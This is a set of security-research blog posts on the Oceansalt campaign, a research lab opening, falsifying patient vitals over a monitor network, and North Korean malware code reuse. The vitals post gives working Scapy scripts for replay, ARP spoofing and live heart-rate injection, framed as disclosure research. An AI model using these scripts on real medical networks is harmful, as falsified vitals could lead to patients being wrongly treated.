‘Operation Oceansalt’ Delivers Wave After Wave

A wall eight feet high with three strands of barbed wire is considered sufficient to deter a determined intruder, at least according to the advice offered by the CISSP professional certification. Although physical controls can be part of a multifaceted defense, an electronic attack affords the adversary time to develop the necessary tools to bypass any logical wall set before them. In the latest findings from the McAfee Advanced Threat Research team, we examine an adversary that was not content with a single campaign, but launched five distinct waves adapted to their separate targets. The new report “Operation Oceansalt Attacks South Korea, U.S., and Canada with Source Code from Chinese Hacker Group” analyzes these waves and their victims, primarily in South Korea but with a few in the United States and Canada.

Although one reaction is to marvel at the level of innovation displayed by the threat actor(s), we are not discussing five new, never-before-seen malware variants—rather the reuse of code from implants seen eight years prior. The Oceansalt malware uses large parts of code from the Seasalt implant, which was linked to the Chinese hacking group Comment Crew. The level of reuse is graphically depicted below:

Code Visualization of Recent Oceansalt with Older Seasalt

Oceansalt, 2018.

Seasalt, 2010.

Who is Behind the Oceansalt Attack?

First exposed under the title APT1, the Comment Crew was identified as the threat actor conducting offensive cyber operations against the United States almost 10 years ago. The obvious suspect is Comment Crew and, although this may seem a logical conclusion, we have not seen any activity from this group since they were initially exposed. Is it possible that this group has returned and, if so, why target South Korea?

It is possible that the source code developed by Comment Crew has now been used by another adversary. To our knowledge, however, the code has never been made public. Alternatively, this could be a “false flag” operation to suggest that we are seeing the re-emergence of Comment Crew. Creating false flags is a common practice.

What Really Matters

It is likely that reactions to this research will focus on debating the identity of the threat actor. Although this question is of great interest, answering it will require more than the technical evidence that private industry can provide. These limitations are frustrating. However, we can focus on the indicators of compromise presented in this report to detect, correct, and protect our systems, regardless of the source of these attacks.

Perhaps more important is the possible return of a previously dormant threat actor, and the question of why this campaign should occur now. Regardless of whether this is a false flag operation to suggest the rebirth of Comment Crew, the impact of the attack is unknown. However, one thing is certain: threat actors have a wealth of code available to leverage in new campaigns, as previous research from the Advanced Threat Research team has revealed. In this case we see collaboration not within a group but potentially between threat actors, offering up considerably more malicious assets. We often talk about partnerships within the private and public sector as the key to tackling the cybersecurity challenges facing society. The bad actors are not putting these initiatives on PowerPoint slides and marketing material; they are demonstrating that partnerships can suit their ends, too.

The post ‘Operation Oceansalt’ Delivers Wave After Wave appeared first on McAfee Blogs.

McAfee Opens State-of-the-Art Security Research Lab in Oregon

McAfee’s Advanced Threat Research team has operated from several locations around the world for many years. Today we are pleased to announce the grand opening of our dedicated research lab in the Hillsboro, Oregon, office near Portland. Although we have smaller labs in other locations, the new McAfee Advanced Threat Research Lab was created to serve two purposes. First, it gives our talented researchers an appropriate work space with access to high-end hardware and electronics for discovery, analysis, automation, and exploitation of vulnerabilities in software, firmware, and hardware. Second, the lab will serve as a demo facility, where the Advanced Threat Research team can showcase current research and live demos to customers or potential customers, law enforcement partners, academia, and even vendors.

The lab has been a labor of love for the past year, with many of the team members directly contributing to the final product. Visitors will have the unique opportunity to experience live and recorded demos in key industry research areas, including medical devices, autonomous and connected vehicles, software-defined radio, home and business IoT, blockchain attacks, and even lock picking! Our goal is to make vulnerability research a tangible and relatable concept, and to shed light on the many security issues that plague nearly every industry in the world.

Much of the research highlighted in the lab has been disclosed by McAfee. Links to recent disclosures from the Advanced Threat Research team:

Articles

Podcasts

Security researcher Douglas McKee prepares his demo of hacking a medical patient’s vitals. 

Onsite visitors will have the opportunity to solve a unique, multipart cryptographic challenge, painted on our custom mural wall in the lab. Those who are successful will receive an Advanced Threat Research team challenge coin! We will soon have an official video from the lab’s opening event online.

The post McAfee Opens State-of-the-Art Security Research Lab in Oregon appeared first on McAfee Blogs.

80 to 0 in Under 5 Seconds: Falsifying a Medical Patient’s Vitals

The author thanks Shaun Nordeck, MD, for his assistance with this report.

With the explosion of growth in technology and its influence on our lives, we have become increasingly dependent on it. The medical field is no exception: Medical professionals trust technology to provide them with accurate information and base life-changing decisions on this data. McAfee’s Advanced Threat Research team is exploring these devices to increase awareness about their security.

Some medical devices, such as pacemakers and insulin pumps, have already been examined for security concerns. To help select an appropriate target for our research, we spoke with a doctor. In our conversations we learned just how important the accuracy of a patient’s vital signs is to medical professionals. “Vital signs are integral to clinical decision making,” explained Dr. Shaun Nordeck. Bedside patient monitors and related systems are key components that provide medical professionals with the vital signs they need to make decisions; these systems became the focal point of this research.

Exploring the attack surface

Most patient monitoring systems comprise at minimum two basic components: a bedside monitor and a central monitoring station. These devices are wired or wirelessly networked over TCP/IP. The central monitoring station collects vitals from multiple bedside monitors so that a single medical professional can observe multiple patients.

With the help of eBay, we purchased both a patient monitor and a compatible central monitoring station at a reasonable cost. The patient monitor tracked heartbeat, oxygen level, and blood pressure; it offered both wired and wireless networking and appeared to store patient information. The central monitoring station ran Windows XP Embedded, had two Ethernet ports, and started up in a limited kiosk mode. Both units were produced around 2004; several local hospitals confirmed that these models are still in use.

The two devices offer a range of potential attack surfaces. The central monitoring station operates fundamentally like a desktop computer running Windows XP, which has been extensively researched by the security community. The application running on the central monitoring station is old; if we found a vulnerability, it would likely be tied to the legacy operating system. The patient monitor’s firmware could be evaluated for vulnerabilities; however, this would affect only one of the two devices in the system and is the hardest vector to exploit. That leaves the communication between the two devices as the most interesting attack vector: if the communication could be compromised, an attack could be device independent and carried out remotely, affecting both devices. Given this possibility, we chose networking as the first target for this research. Dr. Nordeck confirmed that if the information passing to the central monitoring system could be modified in real time, this would be a meaningful and valid concern to medical professionals. Thus the primary question of our research became “Is it possible in real time to modify a patient’s vitals being transmitted over the network?”

Setup

When performing a vulnerability assessment of any device, it is best to first operate the device as originally designed. Tracking vital signs is the essence of the patient monitor, so we looked for a way to accurately simulate those signs for testing. Many hardware simulators are on the market and vary drastically in cost. The cheapest and easiest vital sign to simulate turned out to be a heartbeat. For less than $100 we purchased an electrocardiogram (ECG) simulator on eBay. The following image illustrates our test network:

In our test bed, the patient monitor (left), central monitoring station (right), and a research computer (top) were attached to a standard switch. The research computer was configured on a monitor port of the switch to sniff the traffic between the central monitoring device and the patient monitor. The ECG simulator was attached to the patient monitor.

Reconnaissance

With the network configured, we turned to Wireshark to watch the devices in action. The first test was to boot only the central monitor station and observe any network traffic.

In the preceding screenshot a few basic observations stand out. First, we can see that the central station is sending User Datagram Protocol (UDP) broadcast packets every 10 seconds with a source and destination port of 7000. We can also see clear-text ASCII in the payload, which provides the device name. After collecting and observing these packets for several minutes, we can assume this is standard behavior. Because the central station is running on a Windows XP Embedded machine, we can attempt to verify this information by doing some quick reverse engineering of the binaries used by the application. After loading several libraries into Interactive Disassembler Pro, it is apparent that the symbols and debugging information have been left behind. With a little cleanup and work from the decompilers, we see the following code:

This loop calls a function that broadcasts Rwhat, a protocol used by some medical devices. We also can see a function called to get the amount of time to wait between packets, with the result plugged into the Windows sleep function. This code block confirms what we saw with Wireshark and gives us confidence the communication is consistent.
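For readers following along, the behavior of that loop can be approximated in a few lines of Python. This is a hedged sketch only; the device name, broadcast address, and helper name are placeholders rather than values taken from the binary.

```python
import socket
import time

# A minimal sketch of the broadcast loop recovered from the central station's
# binaries. DEVICE_NAME, the broadcast address, and get_broadcast_interval are
# illustrative placeholders, not values from the decompilation.
DEVICE_NAME = b"CENTRAL-STATION-01"   # clear-text device name seen in the payload
BROADCAST_PORT = 7000                 # source and destination port observed in Wireshark

def get_broadcast_interval() -> int:
    # The real binary fetches this value through a helper; Wireshark showed 10 seconds.
    return 10

def broadcast_presence() -> None:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sock.bind(("", BROADCAST_PORT))   # source port 7000, matching the capture
    while True:
        sock.sendto(DEVICE_NAME, ("255.255.255.255", BROADCAST_PORT))
        time.sleep(get_broadcast_interval())
```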

Having gained basic knowledge of the central monitoring station, the next step was to perform the same test on the patient monitor. With the central station powered down, we booted the patient monitor and watched the network traffic using Wireshark.

We can make similar observations about the patient monitor’s broadcast packets, including the 10-second time delay and patient data in plaintext. In these packets we see that the source port is incrementing but the destination port, 7000, is the same as the central monitoring station’s. After reviewing many of these packets, we find that offset 0x34 of the payload holds a counter that increments by 0xA, or 10, with each packet. There is no good way to extract the patient monitor’s firmware for review without potentially damaging the device. However, the central monitoring station must have code to receive these packets. With a bit of digging through the central station’s binaries, we found the section parsing the broadcast packets from the patient monitor.

The first line of code parses the packet’s payload starting 12 bytes in. If we count 12 bytes into the payload on the Wireshark capture, we can see the start of the patient data in clear text. The next function called is parse_logical_name, whose second parameter is an upper limit for the string being passed; this field has a maximum length of 0x20, or 32, bytes. The subsequent code checks whether this information is empty and stores the data in the field logical_name. This review again helps confirm what we see in real time with Wireshark.
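To make those two observations concrete, here is a small Python sketch that mirrors the parsing logic, combining the logical name handling with the counter seen at offset 0x34. The byte order and field widths are assumptions; only the offsets and the parse_logical_name role come from the capture and decompilation.

```python
# A hedged re-implementation of the broadcast parsing described above.
MAX_LOGICAL_NAME = 0x20   # 32-byte upper limit passed to parse_logical_name

def parse_logical_name(buf: bytes, limit: int) -> str:
    # Read a NUL-terminated ASCII string, capped at `limit` bytes.
    return buf[:limit].split(b"\x00", 1)[0].decode("ascii", errors="replace")

def parse_monitor_broadcast(payload: bytes) -> dict:
    # The clear-text patient/device data begins 12 bytes into the payload.
    name = parse_logical_name(payload[12:], MAX_LOGICAL_NAME)
    # Offset 0x34 holds the counter that grows by 0xA (10) with each packet
    # (4-byte big-endian width is an assumption).
    counter = int.from_bytes(payload[0x34:0x38], "big")
    return {"logical_name": name or "<empty>", "counter": counter}
```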

Now that we understand the devices’ separate network traffic, we can look at how they interact. Using our network setup and starting the ECG simulator, we can see the central monitoring station and the patient monitor come to life.

With everything working, we again use Wireshark to examine the traffic. We find a new set of packets.

In the preceding screen capture we see the patient monitor at IP address 126.4.153.150 is sending the same-size data packets to the central monitoring station at address 126.1.1.1. The source port does not change.

Through these basic tests we learn a great deal:

  • The two devices are speaking over unencrypted UDP
  • The payload contains counters and patient information
  • The broadcast address does not require the devices to know each other’s address beforehand
  • When the data is sent, distinct packets contain the waveform

Attacking the protocol

Our reconnaissance tells us we may have the right conditions for a replay attack. Such an attack would not satisfy our goal of modifying data in real time across the network; however, it would provide more insight about the requirements and may prove useful in reaching our goal.

After capturing the packets from the simulated heartbeat, we attempted to replay the captures using Python’s Scapy library. We did this with the patient monitor turned off and the central monitoring station listening for information. After several attempts, this test was unsuccessful. This failure shows the system expects more than just a device sending data packets to a specific IP address.
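For illustration, a naive replay along these lines might look like the following Scapy sketch. The capture file name and addresses reflect our lab setup and are placeholders; as noted, this approach by itself fails.

```python
from scapy.all import rdpcap, send, IP, UDP, Raw

# A minimal sketch of the first (unsuccessful) replay attempt: read the data
# packets from a capture of the simulated heartbeat and resend them to the
# central monitoring station. "heartbeat_capture.pcap" is a hypothetical file name.
CENTRAL_STATION = "126.1.1.1"

for pkt in rdpcap("heartbeat_capture.pcap"):
    if pkt.haslayer(UDP) and pkt.haslayer(Raw):
        replay = (IP(dst=CENTRAL_STATION) /
                  UDP(sport=pkt[UDP].sport, dport=pkt[UDP].dport) /
                  Raw(load=bytes(pkt[Raw].load)))
        send(replay, verbose=False)
# This alone did not work: the central station expects the handshake described next.
```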

We examined more closely the packets that are sent before the data packets. We learned that even though the packets are sent with UDP, some sort of handshake is performed between the two devices. The next diagram describes this handshake. 

 

In this fanciful dialog, CMS is the central monitoring system; PM is the patient monitor.

To understand what is happening during the handshake, we can relate each phase of this handshake to that of a TCP three-way handshake. (This is only an analogy; the device is not actually performing a TCP three-way handshake.)

The central monitoring station first sends a packet to port 2000 to the patient monitor. This can be considered the “SYN” packet. The patient monitor responds to the central station; notice it responds to the source port of the initial request. This can be considered the “SYN,ACK.” The central station sends the final “ACK,” essentially completing a three-way (or three-step) handshake. Directly following this step, the patient monitor sends another packet to the initial port of the “SYN” packet. The central monitor responds to the patient monitor on port 2000 with a new source port. Immediately following, we see the data packets being sent to the new source port, 3627, named in the previous exchange.
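The patient-monitor side of that exchange can be sketched with plain UDP sockets. This is a simplified approximation of the handshake described above, not the device’s actual implementation; the payload contents are placeholders.

```python
import socket

# Hedged sketch of the patient-monitor role in the handshake.
HANDSHAKE_PORT = 2000

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("", HANDSHAKE_PORT))

# 1. Wait for the central station's "SYN" sent to port 2000.
syn, (cms_ip, cms_port) = sock.recvfrom(2048)

# 2. Answer back to the source port of that request (the "SYN,ACK").
sock.sendto(b"\x00" * len(syn), (cms_ip, cms_port))

# 3. Receive the final "ACK".
ack, _ = sock.recvfrom(2048)

# 4. Send the follow-up packet to the same initial port.
sock.sendto(b"\x00" * len(syn), (cms_ip, cms_port))

# 5. The central station replies from a new source port; that port (3627 in our
#    capture) is where the vitals data packets must be sent.
reply, (_, data_port) = sock.recvfrom(2048)
print(f"data packets go to port {data_port}")
```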

This examination provides insight into why the replay attack did not work. The central station defines for each connection which ports will be open for the incoming data; we need to consider this when attempting a replay attack. Modifying our previous Scapy scripts to account for the handshake, we retested the replay attack. With the new handshake code in place, the test still failed. Taking another look at the “SYN,ACK” packets provides a potential reason for the failure.

At offset 0x3D is a counter that needs to be incremented each time one of these packets is sent. In this case the patient monitor’s source IP address is embedded in the payload at offsets 0x2A and 0x30. This embedded IP address is not as important for this attack, because during the replay our scripts can assume the patient monitor’s IP address; however, it will become more important later. The newly discovered counter needs to be accounted for and incremented.
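In a replay script, those fix-ups amount to a few byte patches per packet. The following sketch assumes a 4-byte big-endian counter and 4-byte embedded addresses; only the offsets themselves come from the capture analysis.

```python
import socket

# Illustrative fix-ups applied to each replayed handshake payload. Counter width
# and byte order are assumptions; offsets 0x2A, 0x30, and 0x3D are from the captures.
def fix_replay_payload(payload: bytes, counter: int, monitor_ip: str) -> bytes:
    buf = bytearray(payload)
    ip_bytes = socket.inet_aton(monitor_ip)
    buf[0x2A:0x2A + 4] = ip_bytes                         # embedded patient monitor IP
    buf[0x30:0x30 + 4] = ip_bytes                         # same address at a second offset
    buf[0x3D:0x3D + 4] = counter.to_bytes(4, "big")       # per-packet counter
    return bytes(buf)
```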

Emulating a patient monitor

By taking these new findings into account, our replay attack becomes successful. If we can observe a certain ECG pattern, we can play it back to the central monitoring station without the patient monitor on the network. Thus we can emulate the function of the patient monitor with any device. The following video demonstrates this emulation using a Raspberry Pi. We set our Scapy scripts to load after booting the Pi, which mimics the idle function of the patient monitor. When the central monitor requests information about the patient’s vitals, the Pi provides the station with an 80-beats-per-minute waveform. This also works with the other vital signs.

Impact of emulation

Although we have not yet reached our goal of real-time modification, we must consider the implications of this type of attack. If someone were to unplug the monitor of a stable patient and replace it with a device that continued to report the same stable vitals, would that cause any harm? Probably not immediately. But what if the stable patient suddenly became unstable? The central station would normally sound an alarm to alert medical personnel, who could take appropriate action. However, if the monitor had been replaced, would anyone know help was needed? The patient monitor also normally sounds alarms that might be heard in and outside of the patient’s room, yet if the monitor were replaced, those alarms would be absent.

In hospitals, nurses and other personnel generally make periodic checks even of stable patients, so any deception might not last long; but it might not need to. What if someone were trying to kidnap a patient? A kidnapper using this technique would alert far fewer people than would otherwise be expected.

Switching from a real patient monitor to an emulator would cause a short loss in communication from the patient’s room to the central monitoring station. Is this enough to make the scenario unrealistic or not a threat? We asked Dr. Nordeck if a short loss in connection could be part of a reasonable scenario. “A momentary disconnection of the ECG would likely go unnoticed as this happens often due to patient movement or changing clothes and, as long as it is reconnected, will be unlikely to cause an alert,” he said.

Modifying vitals in real time

Although emulating the patient monitor is interesting, it did not accomplish our goal of making real-time modifications. Using what we learned while testing emulation, could we perform real-time injection? To answer this question, we must first understand the difference between emulation and real-time injection.

Emulation requires a deeper understanding of how the initial connection, the handshake, between the two devices occurs. When considering real-time modification, this handshake has already taken place. But an attacker would not know which port the data packets are being sent to, nor any of the other ports used in the data stream. Plus, because the real patient monitor is still online, it will constantly send data to the central monitoring station.

One way to account for these factors is to use Address Resolution Protocol (ARP) spoofing. If the patient monitor is ARP spoofed, then the attacker, instead of the central monitoring station, would receive the data packets. This step would allow the attacker to determine which ports are in use and stop the patient monitor’s data from getting to the central monitoring station. Because we have already shown that emulation works, the attacker simply has to send replacement data to the central station while appearing as the patient monitor.
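A minimal Scapy sketch of that ARP-spoofing step might look like the following. The attacker MAC shown is the Kali virtual machine’s address from our lab, and the refresh interval is arbitrary.

```python
import time
from scapy.all import ARP, send

# Hedged sketch of the ARP poisoning used in our lab. Addresses match our test
# bed; ATTACKER_MAC is the Kali VM's interface MAC and is illustrative.
PATIENT_MONITOR_IP = "126.4.153.150"
CENTRAL_STATION_IP = "126.1.1.1"
ATTACKER_MAC = "00:0c:29:a1:6e:bf"

def poison() -> None:
    # Tell the patient monitor that the central station's IP lives at our MAC,
    # so its vitals packets are delivered to us instead of the central station.
    arp = ARP(op=2, psrc=CENTRAL_STATION_IP, pdst=PATIENT_MONITOR_IP,
              hwsrc=ATTACKER_MAC)
    while True:
        send(arp, verbose=False)
        time.sleep(2)   # refresh before the ARP cache entry expires

poison()
```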

For example, consider the following original packet coming from the patient monitor:

The patient monitor sends a packet with the patient’s heartbeat stored at offset 0x71 in the payload. The patient monitor in this screen capture is at IP address 126.4.153.150. An attacker can ARP spoof the patient monitor with a Kali virtual machine.

The ARP packets indicate that the central station, IP address 126.1.1.1, is at MAC address 00:0c:29:a1:6e:bf, which is actually the Kali virtual machine. Wireshark recognizes two MACs with the same IP address assigned and highlights them, showing the ARP spoof.

Next the attacker from the virtual machine at address 126.4.153.153 sends false information to the central monitoring station, still at address 126.1.1.1. In this example, offset 0x71 has been changed to 0x78, or 120. (The attacker could choose any value; the following demo videos use the heartbeat value 180 because it is more alarming.) Also notice the IP address stored in the payload, which we discovered during the reconnaissance phase. It still indicates this data is coming from the original patient monitor address, which is different from the IP address on the packet’s IP header. Due to this implementation, there is no need for the attacker to spoof their IP address for the attack to be successful.
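Putting the pieces together, the injection step reduces to rewriting one byte and forwarding the packet. The sketch below is illustrative; the capture filter, rate value, and addresses reflect our lab setup.

```python
from scapy.all import sniff, send, IP, UDP, Raw

# Hedged sketch of the real-time injection: intercept the spoofed vitals
# packets, overwrite the heart-rate byte at offset 0x71, and forward the
# result to the central station.
CENTRAL_STATION_IP = "126.1.1.1"
FAKE_RATE = 0x78   # 120 bpm; the demo videos use 180 because it is more alarming

def rewrite_and_forward(pkt):
    # Packets from the patient monitor arrive here because of the ARP spoof.
    if pkt.haslayer(UDP) and pkt.haslayer(Raw):
        payload = bytearray(pkt[Raw].load)
        if len(payload) > 0x71:
            payload[0x71] = FAKE_RATE                      # overwrite the heart rate
            forged = (IP(dst=CENTRAL_STATION_IP) /
                      UDP(sport=pkt[UDP].sport, dport=pkt[UDP].dport) /
                      Raw(load=bytes(payload)))
            send(forged, verbose=False)

sniff(filter="udp and src host 126.4.153.150", prn=rewrite_and_forward, store=False)
```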

Two videos show this modification happening in real time:

 

Impact of real-time modification

Although the monitor in the patient’s room is not directly affected, real-time modification is impactful because medical professionals use these central stations to make critical decisions on a large number of patients—instead of visiting each room individually. As long as the changes are believable, they will not always be verified.

Dr. Nordeck explains the impact of this attack: “Fictitious cardiac rhythms, even intermittent, could lead to extended hospitalization, additional testing, and side effects from medications prescribed to control heart rhythm and/or prevent clots. The hospital could also suffer resource consumption.” Dr. Nordeck explained that short changes to a heartbeat would generally trigger the nurse or technician monitoring the central station to page a doctor. The doctor would typically ask for a printout from the central station to review the rhythm. The doctor might also order an additional test, such as an EKG, to verify the rhythm. An EKG, however, would not likely capture an abnormal rhythm if it is intermittent, but the test might reveal an underlying cause for intermittent arrhythmia. Should the rhythm recur intermittently throughout the day, the doctor might make treatment decisions based on this erroneous printout.

The American Heart Association and American College of Cardiology publish guidelines that hospitals are to follow, including for “intermittent cardiac rhythms,” seen in this chart:

A decision tree for treating an intermittent heart rate. Source: American Heart Association.

The first decision point in this tree asks if the patient is hemodynamically stable (whether the blood pressure is normal). This attack does not affect the bedside monitor; a nurse might retake the patient’s blood pressure, which would be normal. The next decision point following the “Yes” path is a diagnosis of focal atrial tachycardia. Regardless of the medical terms and answers, the patient is issued medication. In the case of a network attack, this is medication the patient does not need and that could cause harm.

Conclusion

This research from McAfee’s Advanced Threat Research team shows it is possible to emulate and modify a patient’s vital signs in real time on a medical network using a patient monitor and central monitoring station. For this attack to be viable, an attacker would need to be on the same network as the devices and have knowledge of the networking protocol. Any modifications made to patient data would need to be believable to medical professionals for there to be any impact.

During our research we did not modify the patient monitor, which always showed the true data; but we have proven the impact of an attack can be meaningful. Such an attack could result in patients receiving the wrong medications, additional testing, and extended hospital stays—any of which could incur unnecessary expenses.

Both product vendors and medical facilities can take measures to drastically reduce the threat of this type of attack. Vendors can encrypt network traffic between the devices and add authentication; these two steps would drastically increase the difficulty of this type of attack. Vendors also typically recommend that medical equipment be run on a completely isolated network with very strict network-access controls. If medical facilities follow these recommendations, attackers would need physical access to the network, which greatly reduces the attack surface.

One goal of the McAfee Advanced Threat Research team is to identify and illuminate a broad spectrum of threats in today’s complex and constantly evolving landscape. Through responsible disclosure we aim to assist and encourage the industry toward a more comprehensive security posture. As part of our policy, we reported this research to the vendor whose products we tested and will continue to work with other vendors to help secure their products.

The post 80 to 0 in Under 5 Seconds: Falsifying a Medical Patient’s Vitals appeared first on McAfee Blogs.

Examining Code Reuse Reveals Undiscovered Links Among North Korea’s Malware Families

This research is a joint effort by Jay Rosenberg, senior security researcher at Intezer, and Christiaan Beek, lead scientist and senior principal engineer at McAfee. Intezer has also posted this story. 

Attacks from the online groups Lazarus, Silent Chollima, Group 123, Hidden Cobra, DarkSeoul, Blockbuster, Operation Troy, and 10 Days of Rain are believed to have come from North Korea. But how can we know with certainty? And what connection does a DDoS and disk-wiping attack from July 4, 2009, have with WannaCry, one of the largest cyberattacks in the history of the cyber sphere?  

From the Mydoom variant Brambul to the more recent Fallchill, WannaCry, and the targeting of cryptocurrency exchanges, we see a distinct timeline of attacks beginning from the moment North Korea entered the world stage as a significant threat actor.

Bad actors have a tendency to unwittingly leave fingerprints on their attacks, allowing researchers to connect the dots between them. North Korean actors have left many of these clues in their wake and throughout the evolution of their malware arsenal.

This post reflects months of research; in it we will highlight our code analysis illustrating key similarities between samples attributed to the Democratic People’s Republic of Korea, a shared networking infrastructure, and other revealing data hidden within the binaries. Together these puzzle pieces show the connections between the many attacks attributed to North Korea and categorize different tools used by specific teams of their cyber army.

Valuable context 

This article is too short to dig deeply into the history, politics, and economic changes of recent years. Nonetheless, we must highlight some events to put past and present cyber events into perspective.

The DPRK, like any country, wants to be as self-sufficient and independent as possible. However, for products such as oil, food, and foreign currency for trading, the country lacks resources and has to find ways of acquiring them. What can a nation do when legal international economics are denied? To survive, it must gain foreign currency for trading. One of the oldest ways to do this is to join the worlds of gambling (casinos) and drugs. In 2005, the United States moved to shut down North Korean enterprises involved in illegal operations and investigated a couple of banks in Asia that seemed to have ties with North Korea and operated as money-laundering sites. One bank in particular is controlled by a billionaire gambling mogul who started a casino in Pyongyang and has close ties to the regime. That bank, based in Macau, came back into the picture during an attack on the SWIFT financial system of a bank in Vietnam in 2015. The Macau bank was listed twice in the malware’s code as a recipient of stolen funds:

Figure 1: SWIFT code in malware.

Code reuse

There are many reasons to reuse malware code, which is very common in the world of cybercrime. If we take an average ransomware campaign, for example, once the campaign becomes less successful, actors often change some of the basics, such as using a different packer to bypass defenses. With targeted campaigns, an adversary must keep its tools undetected for as long as possible. By identifying reused code, we gain valuable insights about the “ancestral relations” to known threat actors or other campaigns. Our research was heavily focused on this type of analysis.

In our years of investigating cyber threats, we have seen the DPRK conduct multiple cyber campaigns. In North Korea, hackers’ skills determine which cyber units they work for. We are aware of two major focuses of DPRK campaigns: one to raise money, and one to pursue nationalist aims. The first workforce gathers money for the nation, even if that means committing cybercrime to hack into financial institutions, hijack gambling sessions, or sell pirated and cracked software. Unit 180 is responsible for illegally gaining foreign currency using hacking techniques. The second workforce operates larger campaigns motivated by nationalism, gathering intelligence from other nations and, in some cases, disrupting rival states and military targets. Most of these actions are executed by Unit 121.

We focused in our research on the larger-scale nationalism-motivated campaigns, in which we discovered many overlaps in code reuse. We are highly confident that nation-state–sponsored groups were active in these efforts.

Timeline 

We created a timeline of most of the malware samples and noticeable campaigns that we examined. We used primarily open-source blogs and papers to build this timeline and used the malware artifacts as a starting point of our research.

 

Figure 2: Timeline of malware and campaigns.

Analysis and observations

Similarities

During our research, we found many malware family names that are believed to be associated with North Korea’s cyber operations. To better understand this threat actor and the similarities between the campaigns, we have used Intezer’s code similarity detection engine to plot the links between a vast number of these malware families.

The following graph presents a high-level overview of these relations. Each node represents a malware family or a hacking tool (“Brambul,” “Fallchill,” etc.) and each line represents a code similarity between two families. A thicker line correlates to a stronger similarity. In defining similarities, we take into account only unique code connections and disregard common code or libraries. This definition holds both for this graph and our entire research.

 

Figure 3: Code similarities between North Korean–associated malware families.

We can easily see significant code similarities between almost every one of the attacks associated with North Korea. Our research included thousands of samples, mostly unclassified or uncategorized. This graph was plotted using a data set of only several hundred samples, so there might be more connections than displayed here.
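As a toy illustration of the idea behind such a graph (this is not Intezer’s engine), each family can be reduced to a set of fingerprints of its unique code, with shared library code removed before comparison; the overlap between two sets becomes the edge weight. The families and fingerprints below are placeholders.

```python
from itertools import combinations

# Placeholder fingerprint sets; real input would be code-level features per family.
family_fingerprints = {
    "FamilyA": {"f1", "f2", "f3", "f7"},
    "FamilyB": {"f2", "f3", "f9"},
    "FamilyC": {"f9", "f10"},
}
library_code = {"f7"}   # common/shared code excluded from the comparison

def similarity(a: set, b: set) -> float:
    # Jaccard overlap of the unique (non-library) code of two families.
    a, b = a - library_code, b - library_code
    return len(a & b) / len(a | b) if a | b else 0.0

# Pairs with a non-zero score become edges; a higher score means a thicker line.
for x, y in combinations(family_fingerprints, 2):
    score = similarity(family_fingerprints[x], family_fingerprints[y])
    if score:
        print(f"{x} -- {y}: {score:.2f}")
```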

Deep technical analysis 

During our research, we came across many code similarities between North Korean binaries that had not been seen before. Some of these attacks and malware have not been linked to one another, at least publicly. We will showcase four examples of reused code that has been seen only in malware attributed to North Korea.

  1. Common SMB module

The first code example appeared in the server message block (SMB) module of WannaCry in 2017, Mydoom in 2009, Joanap, and DeltaAlfa. Further shared code across these families is an AES library from CodeProject. These attacks have been attributed to Lazarus; that means the group has reused code from at least 2009 to 2017.

Figure 4: Code overlap of a Mydoom sample.

In the next screenshots we highlight the exact code block that reflects the SMB module we found in campaigns other than WannaCry and Mydoom.

Figure 5: An SMB module common to several attacks.

A lot has been written about WannaCry. As we analyze the code against our databases, we can draw the following overview:

Figure 6: WannaCry code comparison overview.

For our research we compared the three major variants of WannaCry: an early release, called a beta, from February 2017; one from April; and the infamous variant that hit the world in May.

  2. Common file mapping

The second example demonstrates code responsible for mapping a file and using the XOR key 0xDEADBEEF on the first four bytes of the file. This code has appeared in the malware families NavRAT and Gold Dragon, plus a certain DLL from the South Korean gambling hacking campaign. These three RATs are thought to be affiliated with North Korea’s Group 123. NavRAT and the gambling DLL share more code, making them closer variants.

Figure 7: Code overlap in a NavRAT sample.

Figure 8: File-mapping code 
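The routine itself is tiny; a hedged Python equivalent looks like the following. The byte order of the key is an assumption; the distinctive constant 0xDEADBEEF and the first-four-bytes behavior come from the analysis above.

```python
import mmap

# Sketch of the shared routine: map a file and XOR its first four bytes with
# the key 0xDEADBEEF. Key byte order is assumed; the file must be at least 4 bytes.
XOR_KEY = (0xDEADBEEF).to_bytes(4, "big")

def xor_first_dword(path: str) -> bytes:
    with open(path, "r+b") as f:
        with mmap.mmap(f.fileno(), 0) as m:
            m[0:4] = bytes(b ^ k for b, k in zip(m[0:4], XOR_KEY))
            return bytes(m[0:4])
```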

  3. Unique net share

The third example, responsible for launching a cmd.exe with a net share, has been seen in 2009’s Brambul, also known as SierraBravo, as well as KorDllBot in 2011. These malware families are also attributed to the Lazarus group.

Figure 9: Code overlap of a SierraBravo (Brambul) sample.

Figure 10: A code block reused in the malware families Brambul/SierraBravo and KorDllBot.

  4. Operation Dark Hotel

In 2014, Kaspersky reported a more than seven-year campaign against Asian hotels, in which the adversaries used an arsenal of tools to break into the computers of hotel visitors. Zero days and control servers were used, along with the malware family Tapaoux, or DarkHotel, according to the report.

While we examined the DPRK samples, we noticed a hit with the Dark Hotel samples in our collections. By going through the code, we noticed several pieces of code overlap and reuse, for example, with samples from Operation Troy.

Figure 11: Code overlap in a Dark Hotel sample.

Identifying a group

By applying what we learned from our comparisons and code-block identifications, we uncovered possible new links between malware families and the groups using them.

With the different pieces of malware we have analyzed, we can illustrate the code reuse and sharing between the groups known to be affiliated with North Korea.

 

Figure 12: Groups and families linked by code reuse.

The malware attributed to the group Lazarus has code connections that link many of the malware families spotted over the years. Lazarus is a collective name for many DPRK cyber operations, and we clearly see links between malware families used in different campaigns.

The malware families (NavRAT, the gambling DLL, and Gold Dragon) possibly created by Group 123 are connected to each other but separate from those used by Lazarus. Although these are different units focusing on different areas, there seems to be a parallel structure in which they collaborate during certain campaigns.

MITRE ATT&CK

From our research of these malware samples, we can identify the following techniques used by the malware families:

When we zoom in on the Discovery category in the MITRE model, for example, we notice that the techniques are typical for first-stage dropper malware. The adversary drops these samples on victims’ machines and collects information on where they landed in the victims’ networks and which user/access rights they gained.

In 2018, we saw examples of campaigns in which attackers used PowerShell to download and execute these droppers. Once information has been sent to a control server, the adversary determines the next steps, which often include installing a remote access tool to enable lateral movement on the network and pursue the goals of the campaign.

Final words

Security vendors and researchers often use different names when speaking about the same malware, group, or attack. This habit makes it challenging to group all the malware and campaigns. By taking a scientific approach, such as looking for code reuse, we can categorize our findings. We believe our research will help the security community organize the current “mess” we face in relation to North Korean malware and campaigns.

